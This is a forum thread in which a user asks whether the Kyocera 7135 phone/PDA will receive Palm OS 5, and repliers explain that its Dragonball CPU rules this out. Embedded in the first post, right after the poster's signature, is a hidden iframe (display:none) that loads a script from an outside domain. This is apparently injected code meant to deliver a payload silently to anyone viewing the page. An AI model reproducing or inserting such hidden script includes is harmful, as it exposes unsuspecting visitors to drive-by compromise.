+ Reply to Thread

Thread: Os5

Os5

Hello all... I have enjoyed reading this forum and garnered a great deal of useful info along the way..

At any rate, can anyone advise or give an 'electronic' guess as to when the 7135 will offer OS5?

Of course Kyocera was of no assistance and Verizon keeps sending me to Kyocera, what a go round. Then I found this board. I have not purchased yet and was waiting for the OS upgrade, which it appears might not happen, soon?

Thank you for your input.

SS<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

To be honest I have no idea when or if a upgrade will be available, but I highly doubt it.

I think it would require a hardware upgrade to work with the OS5 and seeing how it took a year of development to get the 7135, I would say it's awhile until you see OS5.

My $0.02, I've tried many of the the other phone/PDA's on the market. In my mind, nothing compares to the 7135 - even with OS4 and the slower processor....

The Kyocera will never have OS5

Palm OS 5 (and latter) requires a StrongARM processor. The Kyocera 7135 has a Motorola Dragonball CPU. It's just plain impossible.